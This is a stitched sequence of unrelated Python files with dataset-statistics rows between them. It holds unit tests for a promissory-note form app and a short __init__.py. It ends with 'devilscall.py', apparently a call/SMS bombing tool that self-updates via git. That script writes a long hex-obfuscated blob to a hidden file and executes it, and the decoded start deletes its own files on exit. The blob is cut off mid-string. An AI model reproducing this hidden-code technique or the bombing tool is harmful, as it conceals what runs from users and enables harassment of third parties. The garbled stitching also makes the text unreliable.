issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_city_payment(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_state_payment(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_emitter_name(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_emitter_cpf(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_emitter_address(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_emitter_email(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_returns_false_when_issue_note_promissory_note_does_not_contains_issuance_date(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertFalse(issue_promissory_note_form.validate())
def test_should_due_data_of_data_returns_instance_of_datetime(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertIsInstance(issue_promissory_note_form.data['due_date'], date)
def test_should_issuance_date_of_data_returns_instance_of_datetime(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertIsInstance(issue_promissory_note_form.data['issuance_date'], date)
def test_should_number_of_data_returns_instance_of_int(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertIsInstance(issue_promissory_note_form.data['number'], int)
def test_should_value_of_data_returns_instance_of_float(self):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
issue_promissory_note_form = IssuePromissoryNoteForm(data=data)
self.assertIsInstance(issue_promissory_note_form.data['value'], float)
class AppTests(unittest.TestCase):
def test_should_returns_status_ok_when_send_request_to_index(self):
client = app.test_client()
response = client.get('/')
self.assertEqual(200, response.status_code)
def test_should_returns_template_with_title_promissory_note_when_send_request_to_index(self):
client = app.test_client()
response = client.get('/')
self.assertTrue(b'Promissory Note' in response.data)
@patch('promissory_note.gateways.web.PillowImageGenerationService')
@patch('promissory_note.gateways.web.SendGridEmailPromissoryNoteIssued')
def test_should_returns_status_redirects_when_post_request_is_valid(self,
pillow_image_generation_service,
send_grid_email_promissory_note_issued):
data = {
'number': 100,
'due_date': date.today().strftime('%d/%m/%Y'),
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
'issuance_date': date.today().strftime('%d/%m/%Y'),
}
client = app.test_client()
response = client.post('/', data=data)
self.assertEqual(302, response.status_code)
@patch('promissory_note.gateways.web.PillowImageGenerationService')
@patch('promissory_note.gateways.web.SendGridEmailPromissoryNoteIssued')
def test_should_returns_status_ok_when_post_request_is_invalid(self,
pillow_image_generation_service,
send_grid_email_promissory_note_issued):
data = {
'number': 100,
'value': 100,
'beneficiary_name': 'Steve',
'beneficiary_cpf': '00000000000',
'beneficiary_email': 'captain@marvel.com.br',
'currency': 'dollar',
'city_payment': 'New York',
'state_payment': 'New York',
'emitter_name': 'Tony Stark',
'emitter_cpf': '99999999999',
'emitter_address': 'New York',
'emitter_email': 'iron_man@marvel.com',
}
client = app.test_client()
response = client.post('/', data=data)
self.assertEqual(200, response.status_code)
| 39.766667
| 112
| 0.581098
| 1,921
| 19,088
| 5.438834
| 0.054659
| 0.081738
| 0.053599
| 0.076378
| 0.950804
| 0.941233
| 0.931183
| 0.927929
| 0.927929
| 0.927929
| 0
| 0.042494
| 0.284943
| 19,088
| 479
| 113
| 39.849687
| 0.722983
| 0
| 0
| 0.859951
| 0
| 0
| 0.314176
| 0.034472
| 0
| 0
| 0
| 0
| 0.056511
| 1
| 0.056511
| false
| 0
| 0.009828
| 0
| 0.071253
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
367d212aef1896bc75b2576cd5f40e4dbacfde3e
| 49
|
py
|
Python
|
deep_classifier/logger/__init__.py
|
joonilahn/Deep-Classifier
|
1f764bf3e5038d337bd862fb2a2cb735a3edfef8
|
[
"MIT"
] | null | null | null |
deep_classifier/logger/__init__.py
|
joonilahn/Deep-Classifier
|
1f764bf3e5038d337bd862fb2a2cb735a3edfef8
|
[
"MIT"
] | null | null | null |
deep_classifier/logger/__init__.py
|
joonilahn/Deep-Classifier
|
1f764bf3e5038d337bd862fb2a2cb735a3edfef8
|
[
"MIT"
] | null | null | null |
from .logger_utils import *
from .logger import *
| 24.5
| 27
| 0.77551
| 7
| 49
| 5.285714
| 0.571429
| 0.540541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 49
| 2
| 28
| 24.5
| 0.880952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3d124dd068c20d535b3e9471ddd24eb8ebc3b8f3
| 198,163
|
py
|
Python
|
devilscall.py
|
84KaliPleXon3/Devil-s-Call
|
e5dc7148e5f728c31a6a40211e4a5c00cf07fb3e
|
[
"MIT"
] | 24
|
2021-03-25T16:13:18.000Z
|
2022-03-17T18:25:33.000Z
|
devilscall.py
|
84KaliPleXon3/Devil-s-Call
|
e5dc7148e5f728c31a6a40211e4a5c00cf07fb3e
|
[
"MIT"
] | 1
|
2022-03-06T07:41:56.000Z
|
2022-03-06T07:41:56.000Z
|
devilscall.py
|
84KaliPleXon3/Devil-s-Call
|
e5dc7148e5f728c31a6a40211e4a5c00cf07fb3e
|
[
"MIT"
] | 4
|
2021-04-05T16:16:38.000Z
|
2022-01-24T05:54:21.000Z
|
#!/usr/bin/python3
# This Python file uses the following encoding: utf-8
import getpass
import base64
import multiprocessing
import gettext
import sys
#import ssl
import re
import json
import subprocess
import ctypes
import random
import datetime
from time import sleep
from os import system, environ, path, getuid
from distutils.dir_util import copy_tree
from multiprocessing import Process
from subprocess import check_output, CalledProcessError
from sys import stdout, argv, exit
#change is done
import getpass
import base64
RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, YELLOW2, GREEN2 = '\033[1;91m', '\033[46m', '\033[1;36m', '\033[1;32m', '\033[3;0m' , '\033[1;33m' , '\033[1;93m', '\033[1;92m'
def verCheck():
system('clear')
print("\n{0}[{2}#{0}] {2}Checking For Updates{2}...".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW ))
system('wget -q -O test.txt https://raw.githubusercontent.com/404-ghost/Devil-s-Call/master/version.txt')
system('clear')
file = open('version.txt','r')
a = file.read()
x = a.split("\n")
file2 = open('test.txt','r')
b = file2.read()
z = b.split("\n")
file.close()
file2.close()
if x[0] == z[0]:
print("{0}[{2}#{0}] {2}[Up-To-Date]- {0}v {6}{4}".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, z[0]))
system('git checkout HEAD^ data --quiet && git checkout HEAD^ devilscall.py --quiet && git checkout HEAD^ banner.py --quiet && git checkout HEAD^ LICENSE --quiet && git checkout HEAD^ version.txt --quiet')
system('git stash --quiet')
system('git pull --quiet')
system('rm -rf test.txt')
sleep(2)
else:
print("\n{0}[{2}#{0}] {2}Their Is A Newer Version Available.".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
print("{0}[{2}#{0}] {0}[{2}Current{0}]{2}- {0}v {6}\n{0}[{2}#{0}] {0}[{2}Available{0}]{2}- {0}v.{7}".format(RED, WHITE, CYAN, GREEN, DEFAULT, YELLOW, x[0], z[0]))
print("{0}[{2}#{0}] {2}Updating To The Latest Version {0}[{2}v {6}{0}] \n{0}[{2}#{0}] {2}Please Wait....{7}\n".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, z[0] ,GREEN2))
system('git checkout HEAD^ data --quiet && git checkout HEAD^ devilscall.py --quiet && git checkout HEAD^ banner.py --quiet && git checkout HEAD^ LICENSE --quiet && git checkout HEAD^ version.txt --quiet')
system('git stash --quiet')
system('git pull')
sleep(1)
system('rm -rf test.txt')
file = open('version.txt','r')
a = file.read()
x = a.split("\n")
print("{0}[{2}*{0}] {2}Version Status After Update.{2}.\n".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
print("{0}[{2}*{0}] {0}[{2}Current{0}]{2}- {0}v {6}\n{0}[{2}*{0}] {0}[{2}Available{0}]{2}- {0}v.{7}{4}".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW, x[0], z[0]))
sleep(1)
system('clear')
print("\n\n\n\t\t{2}[{0}#{2}] {0}Restart program \n {2}Enter this command to run {0}-> {3}python3 devilscall.py".format(RED, WHITE, CYAN, GREEN, DEFAULT , YELLOW))
exit()
def loadingHack():
system("clear")
print("\n\n{3}".format(RED, WHITE, CYAN, GREEN, DEFAULT ,YELLOW))
chaine ="/////////////////////"+"[*]"+" Starting Devil-s-Call......"+"/////////////////////".format(RED, WHITE, CYAN, GREEN, DEFAULT ,YELLOW)
charspec = "$*X^%\#~?;"
i=0
while i<1:
chainehack = ""
i +=1
for c in chaine:
chainehack += c
r = random.choice(charspec)+random.choice(charspec)+random.choice(charspec)
if len(chainehack+r) <= len(chaine):
pass
else:
r = ""
sys.stdout.write('\r'+chainehack+r)
sleep(0.06)
system("python3 .main_bomb.py")
def magic():
file1 = open(".main_bomb.py", "w")
L = '''
\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x0a\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x79\x74\x68\x6f\x6e\x33\x0a\x23\x20\x54\x68\x69\x73\x20\x50\x79\x74\x68\x6f\x6e\x20\x66\x69\x6c\x65\x20\x75\x73\x65\x73\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x75\x74\x66\x2d\x38\x0a\x23\x20\x74\x68\x69\x73\x20\x63\x6f\x64\x65\x20\x69\x73\x20\x64\x6f\x6e\x65\x20\x62\x79\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x22\x0a\x69\x6d\x70\x6f\x72\x74\x20\x67\x65\x74\x70\x61\x73\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x62\x61\x73\x65\x36\x34\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6d\x75\x6c\x74\x69\x70\x72\x6f\x63\x65\x73\x73\x69\x6e\x67\x0a\x69\x6d\x70\x6f\x72\x74\x20\x67\x65\x74\x74\x65\x78\x74\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x0a\x23\x69\x6d\x70\x6f\x72\x74\x20\x73\x73\x6c\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6a\x73\x6f\x6e\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x63\x74\x79\x70\x65\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x61\x6e\x64\x6f\x6d\x0a\x69\x6d\x70\x6f\x72\x74\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x0a\x66\x72\x6f\x6d\x20\x74\x69\x6d\x65\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x6c\x65\x65\x70\x0a\x66\x72\x6f\x6d\x20\x6f\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x74\x65\x6d\x2c\x20\x65\x6e\x76\x69\x72\x6f\x6e\x2c\x20\x70\x61\x74\x68\x2c\x20\x67\x65\x74\x75\x69\x64\x2c\x20\x72\x65\x6d\x6f\x76\x65\x0a\x66\x72\x6f\x6d\x20\x64\x69\x73\x74\x75\x74\x69\x6c\x73\x2e\x64\x69\x72\x5f\x75\x74\x69\x6c\x20\x69\x6d\x70\x6f\x72\x74\x20\x63\x6f\x70\x79\x5f\x74\x72\x65\x65\x0a\x66\x72\x6f\x6d\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x63\x68\x65\x63\x6b\x5f\x6f\x75\x74\x70\x75\x74\x2c\x20\x43\x61\x6c\x6c\x65\x64\x50\x72\x6f\x63\x65\x73\x73\x45\x72\x72\x6f\x72\x0a\x66\x72\x6f\x6d\x20\x6d\x75\x6c\x74\x69\x70\x72\x6f\x63\x65\x73\x73\x69\x6e\x67\x20\x69\x6d\x70\x6f\x72\x74\x20\x50\x72\x6f\x63\x65\x73\x73\x0a\x66\x72\x6f\x6d\x20\x73\x79\x73\x20\x69\x6d\x70\x6f\x72\x74\x20\x73\x74\x64\x6f\x75\x74\x2c\x20\x61\x72\x67\x76\x2c\x20\x65\x78\x69\x74\x0a\x66\x72\x6f\x6d\x20\x64\x61\x74\x61\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x66\x72\x6f\x6d\x20\x61\x70\x69\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x66\x72\x6f\x6d\x20\x62\x61\x6e\x6e\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x20\x2a\x0a\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x2c\x20\x59\x45\x4c\x4c\x4f\x57\x32\x2c\x20\x47\x52\x45\x45\x4e\x32\x20\x3d\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x31\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x34\x36\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x33\x3b\x30\x6d\x27\x20\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x20\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x33\x6d\x27\x2c\x20\x27\x5c\x30\x33\x33\x5b\x31\x3b\x39\x32\x6d\x27\x0a\x62\x6c\x69\x6e\x6b\x20\x3d\x20\x22\x5c\x30\x33\x33\x5b\x35\x6d\x22\x0a\x63\x6f\x6c\x6f\x72\x73\x3d\x5b\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x31\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x34\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x35\x6d\x27\x2c\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x5d\x0a\x57\x3d\x27\x5c\x30\x33\x33\x5b\x30\x6d\x27\x0a\x64\x65\x66\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x3a\x0a\x20\x20\x20\x20\x72\x65\x6d\x6f\x76\x65\x28\x22\x2e\x6d\x61\x69\x6e\x5f\x62\x6f\x6d\x62\x2e\x70\x79\x22\x29\x0a\x20\x20\x20\x20\x72\x65\x6d\x6f\x76\x65\x28\x22\x61\x70\x69\x2e\x70\x79\x22\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x22\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x47\x52\x45\x45\x4e\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x65\x63\x68\x6f\x20\x22\x5c\x74\x5c\x74\x54\x68\x61\x6e\x6b\x73\x20\x46\x6f\x72\x20\x55\x73\x69\x6e\x67\x20\x54\x68\x69\x73\x20\x54\x6f\x6f\x6c\x20\x3a\x29\x22\x20\x7c\x20\x62\x6f\x78\x65\x73\x20\x2d\x64\x20\x62\x6f\x79\x27\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x23\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x71\x28\x29\x3a\x0a\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x22\x5c\x6e\x44\x6f\x20\x79\x6f\x75\x20\x61\x67\x72\x65\x65\x20\x74\x6f\x20\x75\x73\x65\x20\x74\x68\x69\x73\x20\x74\x6f\x6f\x6c\x20\x66\x6f\x72\x20\x65\x64\x75\x63\x61\x74\x69\x6f\x6e\x61\x6c\x20\x70\x75\x72\x70\x6f\x73\x65\x73\x20\x6f\x6e\x6c\x79\x3f\x20\x7b\x35\x7d\x28\x7b\x33\x7d\x59\x7b\x35\x7d\x2f\x7b\x30\x7d\x4e\x7b\x35\x7d\x29\x5c\x6e\x7b\x35\x7d\x2d\x2d\x2d\x2d\x3e\x7b\x32\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x27\x59\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x35\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x7b\x30\x7d\x59\x4f\x55\x20\x41\x52\x45\x20\x4e\x4f\x54\x20\x41\x55\x54\x48\x4f\x52\x49\x5a\x45\x44\x20\x54\x4f\x20\x55\x53\x45\x20\x54\x48\x49\x53\x20\x54\x4f\x4f\x4c\x2e\x59\x4f\x55\x20\x43\x41\x4e\x20\x4f\x4e\x4c\x59\x20\x55\x53\x45\x20\x49\x54\x20\x46\x4f\x52\x20\x45\x44\x55\x43\x41\x54\x49\x4f\x4e\x41\x4c\x20\x50\x55\x52\x50\x4f\x53\x45\x2e\x21\x20\x5d\x7b\x34\x7d\x5c\x6e\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x64\x65\x66\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6c\x6f\x67\x6f\x0a\x20\x20\x20\x20\x41\x61\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x31\x6d\x27\x0a\x20\x20\x20\x20\x42\x62\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x32\x6d\x27\x0a\x20\x20\x20\x20\x43\x63\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x33\x6d\x27\x0a\x20\x20\x20\x20\x44\x64\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x34\x6d\x27\x0a\x20\x20\x20\x20\x45\x65\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x35\x6d\x27\x0a\x20\x20\x20\x20\x46\x66\x20\x3d\x27\x5c\x30\x33\x33\x5b\x31\x3b\x33\x36\x6d\x27\x0a\x20\x20\x20\x20\x78\x58\x3d\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x5b\x41\x61\x2c\x42\x62\x2c\x43\x63\x2c\x44\x64\x2c\x45\x65\x2c\x46\x66\x5d\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x78\x58\x29\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x65\x63\x68\x6f\x20\x22\x5c\x74\x5c\x74\x57\x65\x6c\x63\x6f\x6d\x65\x20\x54\x6f\x20\x41\x6e\x6f\x6e\x79\x6d\x6f\x75\x73\x20\x4b\x69\x6c\x6c\x65\x72\x20\x3a\x29\x22\x20\x7c\x20\x62\x6f\x78\x65\x73\x20\x2d\x64\x20\x62\x6f\x79\x27\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x20\x28\x22\x7b\x30\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x44\x45\x46\x41\x55\x4c\x54\x20\x29\x29\x0a\x20\x20\x20\x20\x0a\x64\x65\x66\x20\x72\x65\x6d\x73\x70\x28\x6e\x75\x6d\x29\x3a\x0a\x20\x20\x20\x20\x6e\x75\x6d\x20\x3d\x20\x6e\x75\x6d\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x20\x27\x2c\x20\x27\x27\x29\x0a\x20\x20\x20\x20\x6e\x75\x6d\x20\x3d\x20\x6e\x75\x6d\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x2d\x27\x2c\x20\x27\x27\x29\x0a\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x6e\x75\x6d\x0a\x0a\x64\x65\x66\x20\x6e\x65\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x6d\x20\x3d\x20\x73\